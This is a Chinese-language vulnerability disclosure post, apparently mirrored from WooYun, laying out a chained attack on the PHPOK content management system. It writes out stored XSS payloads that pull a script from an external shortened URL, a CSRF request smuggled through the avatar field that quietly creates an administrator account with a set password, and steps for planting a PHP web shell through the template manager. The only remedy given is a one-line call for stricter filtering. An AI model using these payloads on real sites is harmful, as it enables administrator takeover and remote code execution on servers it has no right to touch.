今天看啥
热点:

Phpok漏洞礼包组合可shell


 

1.2处存储行xss

2.添加管理员帐号密码+利用点

3.后台写shell

1.

第一处

我们先来注册一个帐号。
 

图片1.png



其中帐号这内容为

a');document.write('<script/src=//t.cn/XXXXXXX></script>')//

注册好之后。



后台
 

图片17.png


 

图片3.png



需要点击才能激活xss
 

图片4.png





第二处

留言
 

图片5.png



留言主题

a');document.write('<script/src=//t.cn/XXXXX></script>')//
 

图片6.png


 

图片7.png



同样需要点击
 

图片8.png







2.

添加管理员帐号+利用点

后台添加管理员帐号处,可以csrf。

而且前台头像的地址没有进行效验。


单击修改资料 然后抓包

Post的avatar值修改为

admin.php%3Fc%3Dadmin%26f%3Dsave%26id%3D%26account%3Dwooyun%26pass%3Da123456%26email%3Da123456%26status%3D0%26if_system%3D1

图中的值为url解码的内容
 

图片9.png



然后再注册一个帐号

上传头像

Post的avatar修改为

admin.php%3Fc%3Dadmin%26f%3Dstatus%26id%3D2



等管理员后台查看的时候会自动生成一个管理员

而且状态为可用
 

图片10.png



然后 可以在后台登录





3.

通过前两部可以进入后台

然后 后台写shell



后台 风格管理

然后添加风格
 

图片11.png



这个地方要注意。文件夹只能是系统存在的文件夹,要不会失败的。

所以写系统默认存在的www文件夹就行。
 

图片12.png


 

图片13.png


 

图片14.png





直接写shell



/tpl/www/111.php

代码如下
 

图片15.png

 

 

/tpl/www/111.php

代码如下
 

图片15.png

 

修复方案:

加强过滤

www.bkjia.comtruehttp://www.bkjia.com/wzaq/914782.htmlTechArticlePhpok漏洞礼包组合可shell 1.2处存储行xss 2.添加管理员帐号密码+利用点 3.后台写shell 1. 第一处 我们先来注册一个帐号。 其中帐号这内容为...

相关文章

相关搜索: phpok 漏洞 礼包

帮客评论

视觉看点